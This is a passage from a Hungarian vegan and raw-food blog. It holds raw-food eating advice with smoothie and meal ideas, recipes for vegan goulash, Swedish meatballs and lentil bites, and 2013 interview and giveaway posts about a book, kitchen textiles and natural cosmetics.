vagyok, hogy ha az ember figyeli a testének a jelzéseit (pl. fázósság, melegség), akkor nem teszek még egy lapáttal ellene, hanem támogatom a szervezetem igényét, odafigyelek a vérkeringésemre (pl. mozgással), de a nyers ételek arányán, mennyiségén is változtatok. Az nem lehet jó táplálkozás, ha rosszul érezzük magunkat tőle. Persze sok olajos maggal is lehet ellensúlyozni a fázósságot, de szerintem ez nem megoldás. Nyáron alkattól függően nyugodtan lehet akár több hónapos nyers étkezés is, de a hideg beáltával érdemes a testünk jelzéseit figyelni, hogy jól érezzük-e magunkat a későbbiekben is. Tehát nem szabad görcsösen a nyers ételek teljességére törekedni, a tiszta alapanyagokból készült, teljes értékű ételek is lelkiismeretfurdalás nélkül bátran beiktathatók a táplálkozásunkba, ha testünk és lelkünk úgy kívánja. Mit együnk (igyunk) és hogyan készítsük el? Smoothie receptek: gyümölcs-, zöldség- és zöld turmixok Ezek a gyümölcs- és zöldségturmixok egyszerűen elkészíthetők, és nagyon energiadúsak. Akár sporolás előtt és után tökéletes szénhidrát és fehérje pótlást biztosítanak a szervezetnek, akár egy kis kendermaggal vagy chiamaggal turbózva. Nagyon finom a rostos narancsos naspolyalé , a chox shake turmix , sárgarépás mandulás turmix , vagy a karotinbomba. De gyógyító hatású koktélokat is készíthetünk, ilyen például a csonterősítő koktél, vagy a szemvidító és látásjavító turmix. A növényi tejek kitűnő helyettesítői a bocitejnek. Készíthetünk magtejeket (pl. mandula, dió, szezám), vagy gabonatejet (pl. zab, rizs) is. Az utóbbi esetben 1-2 napos csíráztatásra van szükség, utána már csak turmixolni és szűrni kell. A kókusztej nagyon finom alapja lehet a gyümölcsturmixoknak vagy a gyümölcsleveseknek. A zöld turmix maga a csoda ! Ha csak ennyit változtatunk, és ezt beiktatjuk a mindennapjainkba, akkor már nagyon sokat tettünk az egészségünkért. Elmondható róla, hogy ÉLET, ERŐ, EGÉSZSÉG és még finom is. Sajnos az emberek nem tekintenek a zöld levelekre valódi ételként. ,,A várható élettartam ugrásszerűen megnőne, ha a zöld leveleknek olyan jó lenne az illata, mint a szalonnának - mondta Doug Larson. Pedig a répa zöldjében sokkal több tápanyag van, mint a gyökerében. Míg a cékla gumójában 16 mg kalcium van, addig a levelében 117 mg, az A-vitamin tartalma pedig 192-szer több a gumójánál. Ezek a különbségek igazak más zöldségekre és leveleikre is. Azt se felejtsük el, hogy ezek kitűnő fehérje források. Minden zöld színű növény alapja a klorofill, ezért vérképzésre, tisztításra, nemkívánatos mikroorganizmusok növekedésének megakadályozására egyaránt alkalmas. A klorofillt folyékony napenergiának is nevezik. Sejtjeink a klorofilltartalmú ételeknek köszönhetően több oxigénhez jutnak, mivel a klorofill segíti a hemoglobin (a vörös színt adó vérfesték) képződését, így indirekt módon javítja a szervezetben az oxigénszállítást. A klorofillnak hihetetlenül sokrétű hatása van: javítja a vérképet, segít a rák megelőzésében, lúgosítja a szervezetet, tisztítja a beleket, segíti a máj tisztulását, gyorsítja a sebek begyógyulását, gyulladáscsökkentő hatás, javítja a lábak vérkeringését. Az a helyes, ha az étrendünk legalább 10-15%-át klorofillban gazdag nyers növények teszik ki. A zöld levelek minden más étellel párosíthatók, ezért kitűnő zöld turmixot tudunk készíteni belőlük. Ezáltal ízletesebbé tudjuk varázsolni a zöld levelek ízét. Zöld levélhajtások : rukkola, cékla-, répa-, petrezselyem-, zeller-, retek zöldje, spenót, sóska, mángold, káposzta, saláták. Ehető gyomnövények : tyúkhúr, lóhere, gyermekláncfű, disznóparéj, papsajt, útifű, porcsin, csalán, parlagfű, lucerna. Fűszernövények: kapor, bazsalikom, koriander, édeskömény, menta. Változatos reggelik Én minden reggelt egy pohár vízzel kezdek, majd egy csésze gyógyteával folytatom A továbbiakban sokféle lehetőség adódik. Lehet egyszerűen gyümölcsöt enni, vagy készíthetünk egy gyors banánpudingot, vagy egy nyers müzlit. Maga a Kolláth is nyersnek mondható, és könnyűszerrel készíthetünk granolát akár a sütőben is. Ezt ehetjük gyümölcspürével, vagy frissen készített mandulatejjel, zabtejjel. Csírákat is reggelizhetünk, nagyon finom a gyümölcsös nyers hajdinakása és egy kis maggal. Ilyenkor télen egy fahéjas melegítő reggeli vagy egy vegán mandulajoghurt is tökéletes választás lehet. Ebédre valami finomat Ebédre előszeretettel készítek nyers leveseket . Nyáron nagyon menő a vaníliás sárgabarackkrém leves, a cseresznyekrémleves citromfűvel vagy a fahéjas szilvakrémleves is. Sok recept olajos magot is ír az alapanyagok közé, pl. kesudiót. Én ezt többnyire kihagyom belőle, egyszerűen csak összeturmixolom őket, és kész is van. Télen nagyon finom az aszaltszilvakrémleves, a mézes krémes körteleves vagy a karácsonyi mandarinkrémleves. De nem csak gyümölcsökből lehet készíteni levest, hanem például paradicsomból vagy céklából is. A főételt is lehet változatosan készíteni. A cukkinispagetti paradicsomszósszal , a marinált zöldség egy kis zöldségfasírttal vagy egy tökfőzelék is csodás ebéd lehet. Fasírtokat csírából is készíthetünk, melyeket érdemes egy kicsit megaszalni, vagy a sütőbe tenni, hogy a külseje megszáradjon, de még belül puha marad. Késztítettem már nyers ,,lecsót és székelykáposztát is. Ezek csak fantázianevek, azért ne egy az egyben képzeljük el az ízeket, hiszen ezek más alapanyagok, a fűszerekkel próbáljuk elérni az ízhatást. De így is nagyon finomak, akár székelykáposztának nevezzük akár paradiós magyaros savanyú káposztának. Vacsorára egy könnyű saláta Vacsorára egy egyszerű savanyú káposztás céklasaláta sárgarépás krékerrel tökéletesen elegendő. De isteni finom az krémes káposztasaláta , a kelbimbó saláta retekcsírával , vagy akár az almás-diós töksaláta is. De készíthetünk hajdinamártogatóst , egy egyszerű avokadokrémet vagy egy nyers humuszt is csíráztatott csicseriborsóból. Az almás zellersaláta nemcsak finom, hanem méregtelenítő is. Édes élet: könnyen, gyorsan valami nasit Az édességek készítésénél végtelen lehetőségek vannak. Vannak egyszerű receptek, mint például a világ legegyszerűbb csokipudingja , az avokádós csokikrém , a zserbó bon-bon vagy a csokis sütőtök puding . Egy kisebb munkával gyümölcsös rizssaláta mandulatejszínnel vagy egy csokikrémes brownie csillag könnyűszerrel elkészíthető. Millió lehetőségei vannak a pohárkrémeknek, a tortáknak, az elkészítésükben csak a fantázia szab határt. Kicsit időigényesebb a nyers muffin , vagy a praliné elkészítése. Amennyiben van aszalónk, tudunk készíteni palacsintát , zserbó szeletet , vagy zserbó kréker t is. Kedvenceim lettek a PlanetBIO-s termékek . Olyan univerzálisak, hogy bármilyen nyers ételek alapanyagai lehetnek. Reggelire vagy akár vacsorára kitűnő lehet a Jól induljon a nap alap müzli, amit Lucumával és faeperrel turbóztam fel. Ez a családom kedvence lett, a reggeli nagy slágere. Mandulatejjel és friss gyümölcsel valóban délig tartó lendületet ad. Ennek a müzlinek a sportolói változata a superfood müzli , ami tele van jóságos dolgokkal. Van benne többek között maca, acai, kendermag, guarana is. E müzlinek a turmix változata a superfood sportolói turmix , mely banánnal és gojis almalekvárral turbózva igazi energiabomba. Ez az almalekvár szintén univerzális, hiszen felhasználhatjuk pohárkrémekhez, tortákhoz vagy akár a reggeli müzlinkhez is. Ebben a chia mag fontos alapanyag, mely segít a lekvár állag elérésében. Még egy recept, így a végére, melyet érdemes kipróbálni. Ez a nyers zabkása gojival ízesített almalekvárral . Kívánom minden kedves olvasónak, hogy bátran próbálja ki az oldalon található nyers recepteket, és iktassa be a napi étrendjébe. Mint írtam fentebb, a legfontosabbak a smoothie-k, ezen belül a zöld turmixok! Ha csak ennyit változtat, már sokat tett az egészségéért. A többi már csak hab a tortán. Felhasznált irodalom: - BIRCHER-Benner, M.: Az egészség könyve: Gyümölcsételek és nyersfőzelékek a táplálkozás mint természetes gyógytényezői. - [Budapest]: Belső EGÉSZ-ség Kiadó - DAHLKE, Rüdiger: Holisztikus táplálkozás: jól egyen, hogy jól legyen!. - Budapest: Bioenergetic K., 2007 - DOUGLAS, Graham: 80/10/10: egy étrend, ami egyszerre képes egyensúlyt teremteni egészségben, testsúlyában és életében. - Budapest: Management Bt., 2006 - HOWELL, Edward: Ezim táplálkozás: kulcs a fiatalság megőrzéséhez és az élet meghosszabbításához. - Budapest: Mandala Könyvkiadó, 1985 Családi menü 1.rész
Vegán vörösboros "marha" nokedlivel
Ez a recept neked szól, ha vegán vagy, de szereted a klasszikus magyar konyha ízvilágát. Akkor is, ha a pasid/csajod/barátaid/rokonaid nem azok, és szeretnéd őket elkápráztatni egy tradicionális, de minden részletében vegán kajával. Akkor is, ha nem vagy vegán, de nem szeretnél több ezer forintot a hentesnél hagyni, és 4-5 órát a tűzhely mellett ácsorogni. Peace, love, ízorgia és no koleszterin. Ez a vegán vörösboros ,,marha nokedlivel. Hozzávalók: A pörkölt: - 600g szejtán nagyobb, szabálytalan, falatnyi darabokra vágva - 4-5 db közepes méretű vöröshagyma apróra vágva - 4 gerezd fokhagyma zúzva - 2db paprika apróra vágva (felgyorsíthatjuk a szaftképződést, ha a paprikát és a paradicsomot leturmixolva adjuk az ételhez) - 2db paradicsom apróra vágva - 0,5-0,75 dl jó minőségű házi száraz vörösbor - 6 ek növényi olaj - a mennyiség szükség szerint növelhető (pl.: napraforgó, olíva stb.) - 2 csapott ek őrölt fűszerpaprika (édes) - 1,5 tk őrölt fekete bors - 1,5 tk őrölt kömény - 2 tk só A nokedli: - 300g BL55 finomliszt - 100g csicseriborsóliszt (ez teszi kissé sárgássá a tésztát) - kb. 3,25 dl víz - ízlés szerint fekete só (ez ad neki enyhén tojásos ízhatást) Nyers nokedli tészta, fekete sóval Így készítsd el: - Egy nagyobb lábasban, olajon párold üvegesre a vöröshagymát, majd öntsd rá a felkockázott szejtánt, és pirítsd meg egy kicsit. - Húzd félre a tűzről az edényt és öntsd az alaphoz a zúzott fokhagymát, a paprikát, a borsot, köményt, a sót és keverd át, majd önts hozzá annyi vizet, hogy ellepje. (Fontos, hogy kóstold főzés közben az ételt és ha szükséges fűszerezd tovább.) - Közepes lángon forrald fel a pörköltöt, majd keverd hozzá a paprikát és paradicsomot. Lassú tűzön, néha átkeverve főzd kb. 30-40 percig, amíg a zöldségek teljesen szétfőnek és pörkölt szaftja besűrűsödik, megül a szejtánon (megtapad rajta, nem folyik le). (A vizet időnként pótolni kell, hogy le ne égjen az étel, és legyen elég szaftja.) A főzés utolsó percében keverd hozzá a vörösbort. - Amíg a pörkölt rotyog, készítsd el a nokedlit. Egy tálban keverd össze a finomlisztet, a csicseriborsólisztet és a fekete sót (ne sózd túl a nokedlit, mert a pörkölt ízét módosítani fogja). - Keverj hozzá annyi vizet, amennyitől sűrű, folyós állagú tészta lesz kb. 3,25dl. Nem kell simára keverni a nokedlitésztát, csak az a lényeg, hogy ne maradjon száraz liszt a tálban. - Egy lábasban forralj vizet. A víz fölé helyezett nokedliszaggatóba öntsd bele a tésztát, majd vízszintes mozdulatokkal szaggasd a lobogó vízbe. - Várd meg, amíg a nokedli feljön a víz tetejére, ezután szűrd le, mosd át folyóvízzel, majd lecsepegtetve tedd félre tálalásig. (Az a legjobb, ha a pörkölttel egy időben készül el.) - Az elkészült nokedlit halmozd a tányérok közepére a pörkölt mellé. Adj hozzá néhány szem savanyú uborkát. Az ételt díszítésképpen apróra vágott petrezselyemmel is megszórhatod.
Vegán Svéd húsgolyók barnamártással
A skandináv konyha nagy klasszikusa, amit egy üzletlánc jóvoltából a magyarok is jól ismernek. Amíg sikerül elérni, hogy a kedvelt menüt vegán verzióban is kínálják, itt a bevált recept, amit bátran elkészíthetünk otthon, sikere lesz. Köretként tradicionálisan egészben főtt krumplit, párolt répát, és vörös áfonya lekvárt fogyasztanak hozzá, de népszerű a hasábburgonya is. Hozzávalók: A golyók kb. 20-22 db: - 100g szójagranulátum - 100g kenyérmorzsa - 1 csésze zöldség alaplé + amennyit gyúráskor felvesz - 1 db vöröshagyma apróra vágva - 4 gerezd fokhagyma zúzva - 1/4 tk őrölt szerecsendió - 1/4 tk őrölt kardamom - 1/4 tk őrölt fekete bors - só ízlés szerint - olaj a sütéshez A köret: - egészben főtt burgonya - karikára vágott, párolt répa - vörös áfonya lekvár A mártás: - 1 csésze zöldségalaplé - 1 csésze növényi tej vagy víz - 1 közepes méretű vöröshagyma apróra vágva - 2 ek vegán margarin - 2 csapott ek étkezési keményítő - 2 csapott ek liszt - 1 gerezd fokhagyma zúzva - 1 tk étkezési élesztőpehely (elhagyható) - 1-2 ek szója vagy tamari szósz - 1dl növényi tejszín - só ízlés szerint - 1/4 tk őrölt fekete bors - 1/4 tk őrölt szerecsendió - 1/4 tk kardamom Így készítsd el: A golyók: - Áztasd be a szójagranulátumot egy órára, a zöldség alaplébe, majd keverd hozzá a kenyérmorzsát a hagymát és a fokhagymát, és fűszerezd meg. - Formálj diónyi nagyságú golyókat, melyeket növényi olajban süss meg. Tipp: Ha nem formázható a massza, akkor vagy túl száraz, ez esetben némi zöldségalaplevet kell hozzá keverni, vagy túl nedves, amit további kenyérmorzsa hozzáadásával lehet korrigálni.) A mártás: - Forrósítsd fel a margarint közepes lángon, és dinszteld meg rajta a hagymát. Add hozzá a lisztet és a fokhagymasót, és pirítsd halványbarnára. - Oldd fel az alaplében a keményítőt és a növényi tejszínt, majd adagold a hagymához, csomómentesen elkeverve forrald fel, majd alacsony lángon főzd tíz percig. - Keverd hozzá az élesztőpelyhet és a szójaszószt, fűszerezd, majd főzd tovább 1-2 percig. Vedd le a tűzhelyről és tartsd melegen a tálalásig. Tipp: Ha csomós lett a mártásod, akkor botmixerrel simára keverheted. Tálalás: halmozz néhány golyót a tányérra, öntsd le bőségesen barna mártással, tégy mellé burgonyát és párolt zöldségeket, valamint 1-2 kanál áfonyalekvárt. Jó étvágyat!
Újévi lencsefalatok (vegán, gluténmentes)
Újév első napján a hagyomány szerint lencsét szokás enni azért, hogy egész évben ne fogyjon el a pénz. Ha január elsején első étkezésként lencsét eszünk, soha nem ürül ki a pénztárcánk. Ugyanilyen szerencsét hoz, minden, apró szemű növény - kukorica, rizs, köles, más hüvelyesek. Nem tudom, menyi igazság rejtőzhet ezekben a hagyományokban. Másik érdekesség, hogy a 16. századig Magyarországon karácsonykor kezdődött az év. Karácsony előtt közösségi közlekedésen utazva, akaratlanul is fültanúja voltam, amint valaki azt mondta, ők egy évben, csak egyszer esznek lencsét, újévkor. Az emberek általában lencsefőzeléket, lencsesalátát készítenek ekkor. Következzen most egy olyan recept, ami változatosabbá teheti lencse-evési szokásainkat. Talán nem csak újévre készítik el a konyhában forgolódók a lencsét, hiszen annyira értékes hüvelyes. Alacsony glikémiás indexe miatt mértékkel cukorbetegek is fogyaszthatják. Foszforban, káliumban, magnéziumban, vasban, kalciumban, cinkben, különféle B-vitaminokban gazdag étel, amelynek magas a fehérje tartalma és szervezetünk számára szükséges valamennyi aminosavat is tartalmazza. A recept: Hozzávalók: - 0,5 kg lencse - zabpehely - 1 hagyma - esetleg magok (én darált lenmagot tettem bele egy kanálnyit + szezámmagba hempergettem) - só - bors vagy borsikafű - őrölt köménymag - majoránna - 6-8 gerezd fokhagyma - őrölt pirospaprika - babérlevél - sütőpapír - olaj - uborka - sárga és piros színű (kaliforniai) paprika Elkészítés: A lencsét miután alaposan átmostuk, néhány szál babérlevéllel és egy csapott evőkanál sóval feltesszük főzni - a víz bőségesen ellepje a lencséket. (Ha a közelben tartózkodunk, mehet nagyobb lángon fedő alatt, folyamatos ellenőrzés közben.) Persze, ha tehetjük, érdemes a lencsét előző este, vagy főzés előtt néhány órával beáztatni. Nem vészes, ha nincs rá módunk. Vannak, akik kuktában főzik, jól teszik. Mindeközben előkészítjük a többi hozzávalót. A pépessé főtt lencséhez (a babérleveleket kiszedjük belőle) felaprított hagymát és fokhagymát (vagy pépesre nyomott), egy kevés borsot vagy borsikafüvet és kb. egy csapzott evőkanálnyi őrölt köménymagot és ugyanennyi majoránnát, és valamennyi piros fűszerpaprikát keverünk. Majd annyi zabpelyhet teszünk hozzá, amennyit felvesz úgy, hogy gombócot tudjunk formálni belőle. Természetesen az a jó, ha a gombóc nem ragad a kezünkhöz. Vízbe mártott kézzel könnyebb formálni a golyócskákat. A gombócokat ezt követően pedig szezámmagba hempergetjük. Sütőpapírral bélelt tepsibe sorakoztatjuk őket, mindegyikre pár csepp olajat csepegtetünk, és kb. 30 perc alatt átsütjük. Érdemes úgy 20 perc után kicsit megforgatni a golyókat, hogy mindegyik részük szép, barnás színű legyen. Mikor megsült, a megmosott uborkákat felkarikázzuk, majd a paprikákból kis szeleteket, darabokat vágunk. Fogvájóval pedig összeállítjuk a finom party-falatokat. A fogpiszkálót az uborka széléhez közelebbi részébe érdemes szúrni. Így nem esik le, ha felemeljük.
Farka Lívia: Ennél zöldebb nem lesz! útmutató kézikönyv nyereményjáték
2013. december 22. Zizi kalandjai
Líviát, a Goldenblog nyertes blog szerzőjét egy munka kapcsán ismertem meg. Népszerű blogjának már régóta olvasója vagyok. Lívia 2008 óta publikál urban: eve nevű blogján női témákban – praktikus, gyakorlatias, inspiráló szemlélettel. Idén a Könyvhétre jelent meg az első könyve, Ennél zöldebb nem lesz! címmel (Bookline kiadó), amelyben gyakorlatias tanácsokat ad az időbeosztásra, a célkitűzésre, a motiváció fenntartására, az elvárások, félelmek, kritikák kezelésére, és arra, hogy mit csináljunk, ha a saját utunkra szeretnénk lépni (bármi is legyen az). Színes, rengeteg témát érintő blogja – de akár magazinnak is nevezhetjük -, értéket közvetít az olvasónak és rengeteg apró ötlettel, praktikus tanáccsal (lásd például ezt a nyomtatható 2014-es inspirációs naplót és tervezőt) szolgál minden nő számára. Ami a gasztro témát illeti, kiderült róla, hogy nagy rajongója blogomnak, ugyanis inzulinrezisztens, epehólyag nélkül élő vegaként halmozottan hátrányos helyzetben van, ha éttermekről van szó, így már csak a kényszer miatt is főz otthon elég gyakran, amit egyébként nagyon szeret. Kedvenc étele a sóska főtt krumplival és tükörtojással! Vele készült részletes interjúmat itt olvashatjátok. NYEREMÉNYJÁTÉK! Nyeremény : egy darab Ennél zöldebb nem lesz! kézikönyvet nyer egy szerencsés! Írjátok meg ide kommentben, hogy mi a neve Lívia törpenyuszijának! Egy kis segítséget itt találtok hozzá. Kérem, hogy az alábbi formula minden pontját töltsétek ki (játszhattok extra pontokért is)! Vagyis a számok (+5, +3, +3, +2, +2) melletti lefelé mutató nyilakkal nyissátok meg az ablakokat és hajtsátok végre az apró feladatokat. Ha kommentáltatok a blogon, akkor utána a formulában klikkeljetek a zöld I commented! kockára (ez a lépés kötelező, a többi szabadon választható, plusz pontokat kaptok értük és még nagyobb eséllyel indultok a nyereményért); ha még nem vagy ha már lájkoltátok az urban: eve Facebook oldalát, akkor írjátok be a kis kockába, hogy milyen névvel lájkoltatok (vagyis amilyen névvel vagytok regisztrálva a Facebookon), aztán klikk a zöld Im a Fan!-re. Hasonlóan járhattok el a többi pont esetében is. a Rafflecopter giveaway Szabályok : 2013. december 24-ig lehet játszani. Eredményhirdetés 2013. december 26-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyertesnek a könyvet Lívia postán elküldi (magyarországi címre).
Helyesen cselekszünk, ha a szívet is belefőzzük! + Nyereményjáték
2013. december 13. Zizi kalandjai
Fotó: Fejér János Kósa Gabit a Makifoodnál ismertem meg, egyszer együtt kuktáskodtunk Maki egyik óráján. Nagyon jól tudtunk együtt dolgozni, szuper partner volt a mosogatásban, edény pakolásban, tálalásban és mindemellett jót is beszélgettünk. Kiderült, hogy eredeti végzettségét tekintve szövött anyag tervező, de akkor még éppen kereste az útját, hogy mihez is kezdjen a tehetségével. Mert tehetsége, az van… és nagyszerű kreatív érzékkel áldotta meg az élet. Mindezek mellett Gabi nagyon inspiráló személyiség és Rakottkert nevű blogja is. Ezt tükrözik kiváló textilei is. Gabival beszélgettem egy finom forró csoki mellett. Bemutatnád magad néhány szóban? Mióta tervezel textileket? 2009-ben végeztem a Moholy-Nagy Művészeti egyetemen, szövött anyag tervező szakon. Diplomámra terveztem az első konyhai textilkollekciót és azóta is ezzel foglalkozom. Nagyon szeretem, hogy ezek a tárgyak a hétköznapi élethez kötődnek és hogy másik nagy szenvedélyemmel, a főzéssel is összekapcsolhatók. Te tervezed az anyagot (milyen anyagokból készülnek a termékek), a színeket és a mintát is? A textilek egy részének jellegzetessége a beleszőtt szöveg. Tervezéskor hosszan keresgélem a megfelelő mondatot, mondat-töredéket. Ez a munka egyik legjobb része, nemcsak azért, mert nagyon szeretek olvasni, hanem mert mindig izgalmas rátalálni egy-egy olyan gondolatra, ami kifejez valamit abból a gazdagságból, amit az étkezés jelent a benne részt vevőknek. A textilek 100% len, vagy pamut-len keverékből készülnek, ez biztosítja jó nedvszívó képességüket, moshatóságukat és tartósságukat.Szeretem a pasztell színeket, a nyugodt felületeket, színek és a minta tervezésekor ezek a fő szempontjaim. Fotó: Fejér János Miket tervezel, készítesz? A kollekciók darabjai: különböző méretű abroszok, alátét, asztali futó, konyharuha és bevásárló szatyor. Honnan gyűjtesz inspirációt? A szövés az egyik legősibb emberi tevékenység, a textíliák fontos részei az ember életének. Az én egyik legfőbb inspirációs forrásom is a régi nomád szőnyegek, és a minden nép tárgyi kultúrájában megtalálható szövött anyagok. Az előttünk levő kincsekből táplálkozó teremtő gondolatot szeretem és szeretnék én is ezen az úton járni. Melyik a legkeresettebb darabod? Legnépszerűbb termékeim a feliratos konyharuhák. Ezek között mindenki talál olyan darabot, ami pont passzol ahhoz, akinek ajándékozni szeretnék, vagy éppen saját magukhoz. Egy egyszerű tárgy, ami többlet tartalmat hordoz. Hol lehet találkozni a termékeiddel? Most karácsony előtt december 15-én és 22-én kint leszek a WAMP-on. A Néprajzi Múzeum ajándékboltjában, a Portéka Bolt-ban és a CsúcsCsoki Kávézóban is megvásárolhatók a termékek. Gabi elérhető az alábbi linkeken: - Rakottkert gasztroblog - Rakottkert Facebook oldal - Kósagabi textil Facebook oldal Fotó: Fejér János NYEREMÉNYJÁTÉK! Nyeremény : egy darab Gabi által tervezett konyharuhát (“helyesen cselekszünk, ha a szívet is belefőzzük” – feliratút) nyer egy szerencsés! Menjetek fel Gabi blogjára és írjátok meg ide kommentben, hogy melyik ételét tálalnátok ezen a szép textilen. Kérem, hogy az alábbi formula minden pontját töltsétek ki (játszhattok extra pontokért is)! Vagyis a számok (+5, +3, +3, +3) melletti lefelé mutató nyilakkal nyissátok meg az ablakokat és hajtsátok végre az apró feladatokat. Ha kommentáltatok a blogon, akkor utána a formulában klikkeljetek a zöld I commented! kockára (ez a lépés kötelező, a többi szabadon választható, plusz pontokat kaptok értük és még nagyobb eséllyel indultok a nyereményért); ha még nem vagy ha már lájkoltátok Gabi Facebook oldalait, akkor írjátok be a kis kockába, hogy milyen névvel lájkoltatok (vagyis amilyen névvel vagytok regisztrálva a Facebookon), aztán klikk a zöld Im a Fan!-re; ugyanezt tegyétek meg a Zizi kalandjainál is! a Rafflecopter giveaway Szabályok : 2013. december 15-ig lehet játszani. Eredményhirdetés 2013. december 16-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyertes a nyereményt személyesen átveheti Budapesten Gabitól vagy postázza magyarországi címre.
Vegetáriánus töltött káposzta
A magyar karácsony elképzelhetetlen töltött káposzta nélkül. Ha valaki vegetáriánus, akkor sem kell lemondania erről a laktató, tipikusan magyaros ételről. A recept két változatban készült, szójagranulátummal illetve az indiai házisajttal, a paneerral. Én jobban kedvelem a paneert, ami önmagában... tovább>>
Natúrkozmetikumokkal a szép bőrért! + Nyereményjáték
2013. december 2. Zizi kalandjai
Néhány éve már nemcsak arra figyelek oda, hogy mit eszünk, hanem arra is, hogy mivel tápláljuk, ápoljuk a testünket kívülről. Fontosnak tartom a címke olvasást nemcsak az élelmiszerek esetében, hanem a kozmetikumok esetében is (igen, nem értünk minden egyes szót, de erre vannak hatóanyag elemzők, akiktől lehet tanácsot kérni vagy akiknél lehet tájékozódni egyes összetevőkről). Mostanra előnyben részesítem a natúrkozmetikumokat, amelyeknek az összetevői ellenőrzött gazdálkodásból kerülnek ki és az olyan kozmetikai termékeket készítő vállalkozókat, akik szívvel-lélekkel működtetik cégüket és hisznek abban, hogy az egyszerűbb sokszor több, valamint a minőségi termékek (amelyeket nyugodt szívvel ajánlanak a vásárlóknak) előállítása nem csak pénz kérdése. Egy ilyen cég megálmodójával, létrehozójával, Hegedűs Eszterrel beszélgettem. Bemutatnád néhány szóban a Deja-Vu-t? Végzettségemet tekintve élelmiszeripari mérnök és közgazdász vagyok, egy kereskedelmi multinál beszerzőként dolgoztam összesen 12 évet. Két fiam van, 6 és 9 évesek. Ahogyan ez már sok mindenkivel megesett az élete során, a gyerekeim születése alapjaiban változtatta meg az életemet: áthelyeződtek a prioritások, előtérbe került a család, valamint az egészséges és környezetbarát élet. Amikor szülés után visszamentem dolgozni, úgy éreztem, az már nem az én világom. Sok mindenben úgy éreztem, ellentét feszül az általam megélt és belső meggyőződésemmé tett elvek és a munkám között: nem tudok egyszerre hiteles lenni egy multinál, és közben sok területen teljesen más elveket képviselni. Nem volt jó, hogy a gyerekeimet csak este egy-másfél órára látom, nem szerettem egy fogaskerék lenni a nagy gépezetben, és nagyon nehezen tudtam kezelni a munkahelyi stresszt. Mivel a férjem mindenben támogatott akkor is, átgondolva a helyzetünket és a lehetőségeinket, felmondtam, és megalapítottuk a DEJA-VU Világ-ot, így a szenvedélyem egyben a munkám is lett. A DEJA-VU Világ egy olyan webáruház, melyben természetes kozmetikumok és ökoháztartási kellékek kaphatóak. Olyan termékeket válogatok, amelyek segítenek megtalálni a visszautat a gyökereinkhez, ahhoz a tudáshoz, amit nagyanyáink még tudtak: hogy az egyszerűbb sokszor több. Termékeket, melyeknek használatával mind egészségünket óvjuk, mind pedig környezetünket. Három fő kategóriával indultunk: pipere (natúrkozmetikumok: szappanok, krémek, természetes növényi vajak és hajfestékek), ökoháztartás (folttisztító só, szódabikarbóna, mosószóda, nyírfacukor) és aroma (illóolajok, parfümolajok, aromavizek, hordozóolajok). A termékkínálat folyamatosan bővül, a vásárlói visszajelzések és igények függvényében. Mi a cégetek hitvallása? Természetesen, igényesen, tudatosan. Természetesen: csak olyan termékeket tudok nyugodt szívvel ajánlani, melyeket saját magam is használok, melyek környezet- és emberbarátok. Ez alapján válogatom termékkínálatom elemeit. Igényesen: magas minőségi elvárásokat támasztok mind a termékek minőségével, mind pedig az általunk nyújtott szolgáltatások és tájékoztatás tekintetében. Az eladás fontos, de nem kizárólagos cél. Személyes küldetésemnek tartom, hogy minél több emberhez eljussanak az általam képviselt elvek (ökoéletmód, szépségápolás, egészséges étkezés, tartósítás), és örülök, ha tapasztalataimat minél többen hasznosítják. Felelősséggel tartozom azért, hogy milyen példát nyújtok a gyerekeimnek, és milyen világot hagyok számukra örökül. Tudatosan: hiszem, hogy a sorok között is kell olvasni, sajnos nem szabad mindent elhinni, amit tálalnak nekünk. Tájékozódjunk, olvassuk el az apró betűket, a termékek összetevőit, és válasszunk tudatosan! A pénzünk szavazat, nem mindegy, mire költjük. Támogassuk a kisvállalkozásokat, a helyi vállalkozásokat, építsünk közösséget, figyeljünk oda egymásra! Miért használjunk natúrkozmetikumokat? Az elmúlt évtizedekben, évszázadokban elhitették velünk, hogy a szépség és a fiatalság követendő példa. Megöregedni nem “trendi”. Rászoktattak minket arra, hogy szépségünket rengetegféle szerrel ápoljuk, és lehetőleg azokkal, melyeket a reklámokban látunk. Mindenki gondoljon bele, hogy felkelés és lefekvés között hány termékkel találkozik a bőre, kezdve a tisztálkodástól, az arcápolástól a testápoláson át a sminkekig és a hajfestékekig, a parfümökről ne is beszéljünk. A mai szépségápolási ipar termékeit hatalmas mennyiségben a legmodernebb technológiával állítják elő, a tartósság és az egységesség érdekében a lehető legtöbb olyan összetevőt adva hozzá, melyek fényévekre vannak azoktól a természetes alapanyagoktól, amiket a reklámokban megmutatnak, vagy amiket a flakonon feltüntetnek (illetve a természetes összetevők jellemzően az összetevősor legvégén, minimális mennyiségben szerepelnek). Egy kommersz üzletben kapható kozmetikum nagyon sok összetevőből áll, melyek többsége szintetikus, allergizálhat, vagy esetleg már bizonyítottan káros hatással van az emberi szervezetre, mégis használják, mert üzletileg megéri. Sajnos a nagy nevű márkák sem jelentenek semmire garanciát, sőt. Párhuzamot vonnék az élelmiszerekkel: ma már vásárlás előtt olvassuk el a címkéket, és ha a termék nagyon sok összetevőből áll, inkább hagyjuk a polcon. Sok bőrprobléma, érzékenység kezelhető, javítható, bizonyos esetekben eltüntethető önmagában azzal, hogy lecseréljük kozmetikumainkat egészségesebbekre. Javaslom mindenkinek, hogy ezen elvek alapján nézze át a saját kozmetikumait, tisztítószereit, és tegye fel a kérdést: tényleg szükségem van erre, vagy csak elhitették velem? Melyik a legnépszerűbb terméketek? A legnépszerűbb termékem a xilit . Szépségápolási termékek közül a legkedveltebbek: a bio hidratáló arckrém, a natúr shea vaj és az extraszűz kókuszvaj, a Föld szíve vajkeverék, a pannonhalmi levendulaolaj és az olívaszappanok (Szirmok titka és Amazonas kincse). Az ökoháztartásban pedig a folttisztító só vezet. Neked melyik a legkedvesebb terméked? Nehéz a választás, mert mindegyik a szívemhez nőtt. Ha többet is lehet választani, akkor a Gül baba és a Kávészünet szappanok, a mandarin-pacsuli illatú shea vaj és a most elkészült parfümolajok. Milyen kedvezményekkel élhetnek a vásárlók most az ünnepek közeledtével? Minden decemberben leadott megrendelés után garantált ajándék is jár! Ajándékaink (rendelés leadás dátuma szerint): - December 1-8.: Egy kézzel készült natúrszappan a DEJA-VU Világ kínálatából. Hogy melyik, az legyen meglepetés! - December 9-15.: 5 db karácsonyi ajándékkísérő kártya - December 15-20*.: Egy üveg 100%-os DEJA-VU Világ illóolaj. Hogy melyik? Az egyelőre a mi 